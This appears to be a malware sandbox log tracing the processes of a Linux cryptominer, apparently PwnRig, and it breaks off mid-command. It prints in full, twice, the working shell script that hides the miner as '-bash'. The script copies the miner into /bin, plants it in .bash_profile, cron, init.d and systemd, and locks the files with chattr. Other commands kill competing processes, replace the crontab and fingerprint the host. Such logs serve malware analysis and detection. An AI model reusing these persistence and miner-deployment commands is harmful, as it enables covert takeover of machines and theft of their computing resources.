/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2217 -
/usr/bin/idid -u3⤵PID:2218
/usr/bin/idid -u3⤵PID:2219
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:2220
/bin/rmrm -rf /bin/bprofr3⤵PID:2221
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:2222
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
/usr/bin/idid -u3⤵PID:2224
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2226
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2227
/bin/rmrm -rf /bin/crondr3⤵PID:2228
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2233
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2234
/usr/bin/whichwhich chkconfig3⤵PID:2235
/usr/bin/whichwhich update-rc.d3⤵PID:2236
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:2238 -
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2239
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2239
/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
/bin/systemctlsystemctl daemon-reload4⤵PID:2239
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2260
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2261
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2261
/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
/bin/systemctlsystemctl daemon-reload4⤵PID:2261
/bin/rmrm -rf /bin/initdr3⤵PID:2282
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:2287
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:2288
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2289
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2289
/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
/bin/systemctlsystemctl daemon-reload4⤵PID:2289
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2310
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2311
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2311
/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
/bin/systemctlsystemctl daemon-reload4⤵PID:2311
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:2332
/usr/bin/whichwhich systemctl3⤵PID:2333
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2334
/bin/rmrm -rf /bin/sysdr3⤵PID:2335
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2340
/bin/systemctlsystemctl enable pwnrige.service3⤵PID:2341
/bin/systemctlsystemctl enable pwnrigl.service3⤵PID:2362
/bin/systemctlsystemctl daemon-reload3⤵PID:2383
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵PID:2404
/bin/hostnamehostname -I1⤵PID:2182
/usr/bin/awkawk "{print \$1}"1⤵PID:2184
/bin/grepgrep "Port "1⤵PID:2187
/bin/catcat /etc/ssh/sshd_config1⤵PID:2186
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2189
/usr/bin/headhead -n 11⤵PID:2188
/bin/sedsed -e "s/\$//"1⤵PID:2198
/bin/sedsed -e "s/^ *//"1⤵PID:2197
/usr/bin/cutcut -d: -f21⤵PID:2196
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2201
/usr/bin/awkawk "{print \$4}"1⤵PID:2204
/usr/bin/awkawk "{print \$4}"1⤵PID:2207
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2446 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2470
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2499
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2501
/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
/usr/bin/idid -u3⤵PID:2503
/bin/grepgrep -v grep3⤵PID:2506
/bin/grepgrep /etc/cron3⤵PID:2505
/bin/psps x3⤵
- Reads CPU attributes
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2508
/usr/bin/idid -u3⤵PID:2509
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:2514
/bin/grepgrep -v /usr/sbin/httpd3⤵PID:2513
/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:2512
/bin/grepgrep -v grep3⤵PID:2511
/bin/psps aux3⤵PID:2510
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:2516
/usr/bin/idid -u3⤵PID:2517
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
/usr/bin/awkawk "{print \$1}"1⤵PID:2475
/bin/grepgrep "Port "1⤵PID:2478
/usr/bin/headhead -n 11⤵PID:2479
/bin/catcat /etc/ssh/sshd_config1⤵PID:2477
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2480
/bin/sedsed -e "s/\$//"1⤵PID:2489
/bin/sedsed -e "s/^ *//"1⤵PID:2488
/usr/bin/cutcut -d: -f21⤵PID:2487
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2492
/usr/bin/awkawk "{print \$4}"1⤵PID:2495
/usr/bin/awkawk "{print \$4}"1⤵PID:2498
/usr/bin/wcwc -l1⤵PID:2523
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2522
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2521
/bin/grepgrep -v grep1⤵PID:2520
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/crontabcrontab -r1⤵PID:2529
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads runtime system information
/usr/bin/pkillpkill -f .klibsystem41⤵PID:2531
/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:2532
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:2535
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:2536
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:2537
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:2538
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:2539
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:2540
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:2541
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:2542
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:2543
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:2544
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:2545
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:2546
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:2548
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2549 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2550
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2579
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2581
/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
/usr/bin/idid -u3⤵PID:2583
/bin/grepgrep -v grep3⤵PID:2586
/bin/grepgrep /etc/cron3⤵PID:2585
/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a 